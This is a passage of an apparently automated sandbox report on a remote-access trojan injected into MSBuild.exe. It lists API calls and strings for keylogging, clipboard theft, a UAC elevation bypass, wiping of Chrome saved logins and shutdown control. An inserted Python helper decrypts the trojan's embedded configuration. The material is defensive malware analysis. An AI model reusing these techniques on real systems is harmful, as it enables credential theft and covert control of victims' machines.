                                                                                                  • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                  • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                                                                • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                                                                • API String ID: 726551946-3025026198
                                                                                                • Opcode ID: 44e9be4fe56ddda769b27416e029fb37a6138cf2d52f58cb8d7ee8808ed05c56
                                                                                                • Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
                                                                                                • Opcode Fuzzy Hash: 44e9be4fe56ddda769b27416e029fb37a6138cf2d52f58cb8d7ee8808ed05c56
                                                                                                • Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A
                                                                                                APIs
                                                                                                • OpenClipboard.USER32 ref: 004159C7
                                                                                                • EmptyClipboard.USER32 ref: 004159D5
                                                                                                • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                                                                • CloseClipboard.USER32 ref: 00415A5A
                                                                                                • OpenClipboard.USER32 ref: 00415A61
                                                                                                • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                • CloseClipboard.USER32 ref: 00415A89
                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                • String ID:
                                                                                                • API String ID: 3520204547-0
                                                                                                • Opcode ID: 2a1386c91a3013a704f514e3dbf9768ee6ffa9c8b61bbb4a0d43227320b98d4b
                                                                                                • Instruction ID: b8e523df9fc7c7245f85f50a48877f09888e29e8b5459684195c928b546a98bf
                                                                                                • Opcode Fuzzy Hash: 2a1386c91a3013a704f514e3dbf9768ee6ffa9c8b61bbb4a0d43227320b98d4b
                                                                                                • Instruction Fuzzy Hash: E02183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                                                                APIs
                                                                                                • GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
                                                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                • GetKeyboardLayout.USER32(00000000), ref: 00409B52
• GetKeyState.USER32(00000010), ref: 00409B5C
• GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
• ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409B8A
• ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
• ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409C1C
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
Similarity
• API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
• String ID: 8[G
• API String ID: 1888522110-1691237782
• Opcode ID: 925a5eb4e75251b1def6021025d6fe2bb9c2de734200d7c4e5adce8016dcfecb
• Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
• Opcode Fuzzy Hash: 925a5eb4e75251b1def6021025d6fe2bb9c2de734200d7c4e5adce8016dcfecb
• Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96
APIs
• _wcslen.LIBCMT ref: 00406788
• CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
Similarity
• API ID: Object_wcslen
• String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
• API String ID: 240030777-3166923314
• Opcode ID: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
• Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
• Opcode Fuzzy Hash: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
• Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D
APIs
• OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
• EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
• GetLastError.KERNEL32 ref: 00419935
• EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
Similarity
• API ID: EnumServicesStatus$ErrorLastManagerOpen
• String ID:
• API String ID: 3587775597-0
• Opcode ID: 21306a6d170464e398bc9c276bf9a537ab87cc1f28e8c9600cdaabf4a7e3423f
• Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
• Opcode Fuzzy Hash: 21306a6d170464e398bc9c276bf9a537ab87cc1f28e8c9600cdaabf4a7e3423f
• Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A
APIs
• FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
• FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
• SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B529
• DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B536
  • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
• FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
• RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
• GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B570
• FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B583
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
Similarity
• API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
• String ID:
• API String ID: 2341273852-0
• Opcode ID: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
• Instruction ID: e81c2b0307560c21eb772b723951cbad4d8c7a866ea933437d0d5d39764c0eb1
• Opcode Fuzzy Hash: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
• Instruction Fuzzy Hash: 0031627184921CAACB20D7B1AC89ADA77BCAF04309F4405EBF505D3181EB799AC5CE69
APIs
• FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
• FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B
  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
Similarity
• API ID: File$Find$CreateFirstNext
• String ID: @CG$XCG$`HG$`HG$>G
• API String ID: 341183262-3780268858
• Opcode ID: 5cf0a3bc43e1aeca7a1fdf8e8c6366a9e7020da5eed0448e09762ca7f956a901
• Instruction ID: 861c71bda04042c44626cba1538e35c757a91b728f0af2478fb4c1063bb13cc5
• Opcode Fuzzy Hash: 5cf0a3bc43e1aeca7a1fdf8e8c6366a9e7020da5eed0448e09762ca7f956a901
• Instruction Fuzzy Hash: B08141315042405BC314FB62C892EEFB3A5AFD1718F50493FF946671E2EF389A49C69A
APIs
• RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
• LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
• GetProcAddress.KERNEL32(00000000), ref: 004131F4
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
Similarity
• API ID: AddressCloseCreateLibraryLoadProcsend
• String ID: SHDeleteKeyW$Shlwapi.dll
• API String ID: 2127411465-314212984
• Opcode ID: 2fcb7f26fc495b18e9ee4ed0816a0069380d4d89fb54b819e432e583a1d7f073
• Instruction ID: cc67afc49b78d61a2372e1362dfc4f5d4a672f2d1b5b468e2109e7b1f18a6fb5
• Opcode Fuzzy Hash: 2fcb7f26fc495b18e9ee4ed0816a0069380d4d89fb54b819e432e583a1d7f073
• Instruction Fuzzy Hash: 4FB1B671A043006BC614BA76CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
APIs
• DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
• GetLastError.KERNEL32 ref: 0040B261
Strings
• \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
• [Chrome StoredLogins not found], xrefs: 0040B27B
• UserProfile, xrefs: 0040B227
• [Chrome StoredLogins found, cleared!], xrefs: 0040B287
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
Similarity
• API ID: DeleteErrorFileLast
• String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
• API String ID: 2018770650-1062637481
• Opcode ID: 093e2210f0edd2306c37cbcd3a4d89727b881328f0745d53c39545fa67deff86
• Instruction ID: 236ee74dc97b4bdf00ef4875347123a6b81b21ae8e03a402b83ae8c28ff1bd46
• Opcode Fuzzy Hash: 093e2210f0edd2306c37cbcd3a4d89727b881328f0745d53c39545fa67deff86
• Instruction Fuzzy Hash: 3001A23168410597CA0477B5ED6F8AE3624E921704F50017FF802731E2FF3A9A0586DE
APIs
• GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
• OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
• GetLastError.KERNEL32 ref: 00416B02
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
Similarity
• API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
• String ID: SeShutdownPrivilege
• API String ID: 3534403312-3733053543
• Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
• Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
• Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
• Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
APIs
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
Similarity
• API ID: __floor_pentium4
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 4168288129-2761157908
• Opcode ID: 66bc95b00190c33de1dc88885a8d3c2e2540cf288971a00217ef3550ead5f7a6
• Instruction ID: 57cc16b57fb9b80973019f24a4c29afa226e887048a240d5689d112d8919aadd
• Opcode Fuzzy Hash: 66bc95b00190c33de1dc88885a8d3c2e2540cf288971a00217ef3550ead5f7a6
• Instruction Fuzzy Hash: 08C26F72D046288FDB25CE28DD407EAB7B5EB44346F1441EBD84DE7242E778AE898F44
APIs
• __EH_prolog.LIBCMT ref: 004089AE
  • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
  • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
• FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
• FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
• FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
  • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
  • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
  • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(0040466D,000000FF,00000000,?,?,00000000,?,0040466D,00000000,?,?), ref: 004047FD
  • Part of subcall function 004047EB: SetEvent.KERNEL32(0040466D,?,00000000,?,0040466D,00000000,?,?,?,00000000), ref: 00404808
  • Part of subcall function 004047EB: CloseHandle.KERNEL32(0040466D,?,00000000,?,0040466D,00000000,?,?,?,00000000), ref: 00404811
• __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
Similarity
• API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
• String ID:
• API String ID: 4043647387-0
• Opcode ID: f77ff04bd8ddbdee7f05524a32e3f1eb592b07934ba2033eafa5768ce33d52d9
• Instruction ID: d7705bc86650fd6632c5f082d335fbcd32bd3fe840799e2454ee74f5ab9ae988
• Opcode Fuzzy Hash: f77ff04bd8ddbdee7f05524a32e3f1eb592b07934ba2033eafa5768ce33d52d9
• Instruction Fuzzy Hash: 11A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF546B71D2EF385E498B98
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
• OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
• CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
• StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
• CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
• CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
Similarity
• API ID: Service$CloseHandle$Open$ManagerStart
• String ID:
• API String ID: 276877138-0
• Opcode ID: b329c8b03f607fc556bfe747d7dfe709dacdcffe937466b951116c7124fc47ce
• Instruction ID: 9ab78235182221d9a13884b701025ebbd4d22640777282bd149d85cf0e5c5631
• Opcode Fuzzy Hash: b329c8b03f607fc556bfe747d7dfe709dacdcffe937466b951116c7124fc47ce
• Instruction Fuzzy Hash: 46F0E971404314AFD2115B31FC88DBF2AACEF85BA2B00043AF54193191CF68CD4595B9
APIs
  • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
  • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
  • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
  • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
  • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
• ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
• LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
• GetProcAddress.KERNEL32(00000000), ref: 00415977
Memory Dump Source
• Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                • String ID: PowrProf.dll$SetSuspendState
                                                                                                • API String ID: 1589313981-1420736420
                                                                                                • Opcode ID: d0c288be5905aeb1458c4e67f100ac3994066ae8866f0c60d59ab3cb864808a3
                                                                                                • Instruction ID: 94bd0be5b4d635cf3270abd21b93e0cba208aed3fdadf5553bbce7524c8ebf13
                                                                                                • Opcode Fuzzy Hash: d0c288be5905aeb1458c4e67f100ac3994066ae8866f0c60d59ab3cb864808a3
                                                                                                • Instruction Fuzzy Hash: 7D2150B0604741E6CA14F7B19856AEF225A9F80748F40883FB402A72D2EF7CDC89865E
                                                                                                APIs
                                                                                                • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 0045127C
                                                                                                • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 004512A5
                                                                                                • GetACP.KERNEL32 ref: 004512BA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID: ACP$OCP
                                                                                                • API String ID: 2299586839-711371036
                                                                                                • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                • Instruction ID: bcb6c1b5649eca6e102b6d6ca9fa22aa61ab34f591545d84575f60c76f210f03
                                                                                                • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                • Instruction Fuzzy Hash: 50212722600100A6D7348F54D900BAB73A6AB40B66F1645E6FD09E7322F736DD49C799
                                                                                                APIs
                                                                                                • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
                                                                                                • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
                                                                                                • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
                                                                                                • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                • String ID: SETTINGS
                                                                                                • API String ID: 3473537107-594951305
                                                                                                • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                • Instruction ID: 83a829ee02157d331b98a48cb758db5ec39b6d120b3a3db205f860a33549a403
                                                                                                • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                • Instruction Fuzzy Hash: 3EE01A3A200710ABCB211BA5BC8CD477E39E7867633140036F90582331DA358850CA59
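The FindResourceA/LoadResource/LockResource/SizeofResource sequence recorded above, with the resource name SETTINGS and type 0000000A (RT_RCDATA), is the point at which the injected payload reads its embedded configuration out of its own PE resource section. The report itself only shows the API calls; the layout of that resource is not on this page. The helper below is an added analysis example, not code from Joe Sandbox or from the report, and it assumes the layout commonly documented for Remcos builds: a one-byte key length, the RC4 key, then the RC4-encrypted configuration, with fields joined by the separator b"|\x1e\x1e\x1f|". Both the layout and the separator are assumptions here; the PE resource walk uses the third-party pefile package and is only exercised if you point it at a dumped sample, while the blob-level functions run stand-alone on a constructed sample.

```python
"""Decrypt a Remcos-style SETTINGS RCDATA resource (added analysis helper).

Assumptions, none of which are stated in the sandbox report:
  * the resource is RC4-encrypted and laid out as [key_len:1][key:key_len][ciphertext];
  * the decrypted configuration is a list of fields joined by FIELD_SEPARATOR.
"""
from __future__ import annotations

from typing import List

RT_RCDATA = 10                         # matches FindResourceA(SETTINGS, 0000000A, ...) in the report
RESOURCE_NAME = "SETTINGS"
FIELD_SEPARATOR = b"|\x1e\x1e\x1f|"    # assumed separator used by recent Remcos builds

# Constructed sample data (not taken from the analysed file), used by the demo below.
CONSTRUCTED_KEY = b"pass"
CONSTRUCTED_FIELDS = [b"192.0.2.10:2404:1", b"RemoteHost", b"Rmc-TEST"]


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA followed by PRGA); encryption and decryption are the same operation."""
    if not key:
        raise ValueError("RC4 key must be non-empty")
    s = list(range(256))
    j = 0
    for i in range(256):                               # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                                  # pseudo-random generation, XORed onto data
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decrypt_settings_blob(blob: bytes) -> bytes:
    """Split a SETTINGS blob into key and ciphertext and RC4-decrypt the ciphertext."""
    if len(blob) < 2:
        raise ValueError("SETTINGS blob too short")
    key_len = blob[0]
    key, ciphertext = blob[1:1 + key_len], blob[1 + key_len:]
    if len(key) != key_len:
        raise ValueError("SETTINGS blob truncated inside the key")
    return rc4(key, ciphertext)


def split_config(plaintext: bytes) -> List[str]:
    """Split decrypted configuration into its fields (assumed separator)."""
    return [field.decode("latin-1") for field in plaintext.split(FIELD_SEPARATOR)]


def encrypt_settings_blob(key: bytes, plaintext: bytes) -> bytes:
    """Inverse of decrypt_settings_blob; used here only to build the constructed sample."""
    if not 1 <= len(key) <= 255:
        raise ValueError("key length must fit in one byte")
    return bytes([len(key)]) + key + rc4(key, plaintext)


def extract_settings_resource(pe_path: str) -> bytes:
    """Return the raw SETTINGS RCDATA resource of a PE on disk (requires the pefile package)."""
    import pefile  # third-party dependency, assumed to be installed
    pe = pefile.PE(pe_path)
    for rtype in pe.DIRECTORY_ENTRY_RESOURCE.entries:
        if rtype.id != RT_RCDATA:
            continue
        for entry in rtype.directory.entries:
            if entry.name is not None and str(entry.name) == RESOURCE_NAME:
                data_entry = entry.directory.entries[0].data.struct
                return pe.get_data(data_entry.OffsetToData, data_entry.Size)
    raise LookupError("no RCDATA resource named SETTINGS")


def constructed_blob() -> bytes:
    """Build the constructed sample blob so the decrypt path can be exercised offline."""
    return encrypt_settings_blob(CONSTRUCTED_KEY, FIELD_SEPARATOR.join(CONSTRUCTED_FIELDS))


if __name__ == "__main__":
    import sys
    blob = extract_settings_resource(sys.argv[1]) if len(sys.argv) > 1 else constructed_blob()
    for index, field in enumerate(split_config(decrypt_settings_blob(blob))):
        print(f"[{index}] {field}")
```

Run it with the path of a dumped payload (the 0000000C...400000 memory dump from this report, rebuilt as a PE, is the natural input) to list the fields, or with no argument to see the round trip on the constructed sample. Field positions and their meaning vary between builds, so treat the index numbers as a starting point for manual inspection rather than a fixed schema.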
                                                                                                APIs
                                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                                • GetUserDefaultLCID.KERNEL32 ref: 004514C3
                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 0045151E
                                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
                                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
                                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00451594
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                • String ID:
                                                                                                • API String ID: 745075371-0
                                                                                                • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                • Instruction ID: fdda48fcf8ef828b158f806230e01f9d82b9b72a6df542884d0e4dc3e0683d2c
                                                                                                • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                • Instruction Fuzzy Hash: 5A51D571900205ABEF10EFA5CC40BBF73B8AF05702F14056BFD11EB262E7789A488769
                                                                                                APIs
                                                                                                • __EH_prolog.LIBCMT ref: 00407A91
                                                                                                • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$File$CloseFirstH_prologNext
                                                                                                • String ID:
                                                                                                • API String ID: 1157919129-0
                                                                                                • Opcode ID: c0514443f6b551c60d72a0102ad1ef2ed694fa26d927559f69c4179237a11564
                                                                                                • Instruction ID: c296e4c637b16ec180f1d25cf2666c4e6f2336455dd814d501b84ef2841b6e91
